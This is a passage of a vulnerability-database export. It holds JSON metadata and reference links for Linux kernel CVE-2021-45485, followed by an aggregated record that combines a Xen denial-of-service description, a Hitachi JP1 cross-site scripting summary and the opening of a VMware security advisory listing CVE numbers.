        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-327",
        "trust": 1.1
      },
      {
        "problemtype": "Use of incomplete or dangerous cryptographic algorithms (CWE-327) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-409116"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://arxiv.org/pdf/2112.09604.pdf"
      },
      {
        "trust": 2.6,
        "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20220121-0001/"
      },
      {
        "trust": 1.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.13.3"
      },
      {
        "trust": 1.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=62f20e068ccc50d6ab66fdb72ba90da2b9418c99"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45485"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-45486"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-45485"
      },
      {
        "trust": 0.7,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.7,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3752"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-4157"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3744"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-27820"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3743"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-1011"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-4037"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-29154"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3759"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-4083"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-37159"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3772"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-0404"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3669"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3764"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-13974"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-20322"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-0322"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3773"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-4002"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-41864"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-43976"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-4197"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-0002"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-4203"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-0941"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-43389"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-44733"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3612"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-42739"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-0286"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-0001"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-26401"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1225"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.2855"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/169411/red-hat-security-advisory-2022-6991-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/169719/red-hat-security-advisory-2022-7216-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.0061"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0121"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0380"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/169997/red-hat-security-advisory-2022-8609-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/169695/red-hat-security-advisory-2022-7211-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022062931"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.5590"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/169941/red-hat-security-advisory-2022-7874-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6062"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-information-disclosure-via-ipv6-id-generation-37138"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6111"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166101/ubuntu-security-notice-usn-5299-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0615"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.3136"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022070643"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0205"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.3236"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0215"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.5536"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-43056"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2020-4788"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-21781"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3752"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3772"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3759"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3773"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3743"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3764"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-37159"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4002"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3744"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3634"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-4189"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3634"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3737"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4037"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4157"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0235"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-41617"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-1271"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2018-25032"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-19131"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-19131"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-42739"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4203"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4197"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.6_release_notes/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-41864"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0536"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-21803"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-24785"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23806"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-29810"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1154"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35492"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35492"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3807"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3737"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/327.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6983"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5299-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1988"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4305"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1708"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3696"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-38185"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28733"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0492"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29526"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28736"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3697"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28734"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25219"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28737"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25219"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3695"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5392"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43389"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1975"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:4814"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-39293"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-39293"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3807"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26691"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5483"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23852"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3918"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43858"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27191"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24778"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43565"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43816"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-41190"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-41190"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24450"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:4956"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0778"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3918"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30322"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21626"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21626"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30322"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30321"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21628"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2588"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:7874"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-39399"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30321"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2588"
      },
      {
        "trust": 0.1,
        "url": "https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21619"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45486"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21123"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26945"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21618"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21618"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhba-2022:7873"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21125"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21628"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21619"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30323"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26945"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21125"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-41974"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-409116"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-45485"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "db": "PACKETSTORM",
        "id": "167330"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "167459"
      },
      {
        "db": "PACKETSTORM",
        "id": "169941"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-409116"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-45485"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "db": "PACKETSTORM",
        "id": "167330"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "167459"
      },
      {
        "db": "PACKETSTORM",
        "id": "169941"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-12-25T00:00:00",
        "db": "VULHUB",
        "id": "VHN-409116"
      },
      {
        "date": "2021-12-25T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-45485"
      },
      {
        "date": "2023-01-18T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "date": "2022-05-11T16:54:36",
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "date": "2022-06-29T20:27:02",
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "date": "2022-05-11T16:37:26",
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "date": "2022-05-31T17:24:53",
        "db": "PACKETSTORM",
        "id": "167330"
      },
      {
        "date": "2022-07-01T15:04:32",
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "date": "2022-06-09T16:11:52",
        "db": "PACKETSTORM",
        "id": "167459"
      },
      {
        "date": "2022-11-18T14:28:39",
        "db": "PACKETSTORM",
        "id": "169941"
      },
      {
        "date": "2021-12-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      },
      {
        "date": "2021-12-25T02:15:06.667000",
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-409116"
      },
      {
        "date": "2023-02-24T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-45485"
      },
      {
        "date": "2023-01-18T05:28:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "date": "2023-01-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      },
      {
        "date": "2023-02-24T15:07:31.653000",
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Vulnerability in using cryptographic algorithms in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "encryption problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      }
    ],
    "trust": 0.6
  }
}

var-201312-0004
Vulnerability from variot

Xen in the Linux kernel, when running a guest on a host without hardware assisted paging (HAP), allows guest users to cause a denial of service (invalid pointer dereference and hypervisor crash) via the SAHF instruction. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Xen is prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause the host operating system to consume excessive amounts of resources, denying service to legitimate users. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following products are affected: JP1/IT Resource Management - Manager JP1/IT Service Level Management - Manager.

Certain unspecified input is not properly sanitised before being returned to the user.

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

This update also fixes several bugs. Documentation for these bug fixes will be available shortly from the Technical Notes document linked to in the References section. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2012-0001 Synopsis: VMware ESXi and ESX updates to third party library and ESX Service Console Issue date: 2012-01-30 Updated on: 2012-01-30 (initial advisory)

CVE numbers: --- COS Kernel --- CVE-2011-0726, CVE-2011-1078, CVE-2011-1079, CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166, CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494, CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649, CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182, CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745, CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022, CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525, CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495, CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 --- COS cURL --- CVE-2011-2192 --- COS rpm --- CVE-2010-2059, CVE-2011-3378 --- COS samba --- CVE-2010-0547, CVE-2010-0787, CVE-2011-1678, CVE-2011-2522, CVE-2011-2694 --- COS python --- CVE-2009-3720, CVE-2010-3493, CVE-2011-1015, CVE-2011-1521 --- python library --- CVE-2009-3560, CVE-2009-3720, CVE-2010-1634, CVE-2010-2089, CVE-2011-1521


  1. Summary

VMware ESXi and ESX updates to third party library and ESX Service Console address several security issues.

  1. Relevant releases

ESXi 4.1 without patch ESXi410-201201401-SG

ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG, ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG, ESX410-201201407-SG

  1. Problem Description

a. ESX third party update for Service Console kernel

The ESX Service Console Operating System (COS) kernel is updated to
kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the
COS kernel.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166,
CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494,
CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,
CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182,
CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745,
CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,
CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,
CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues.

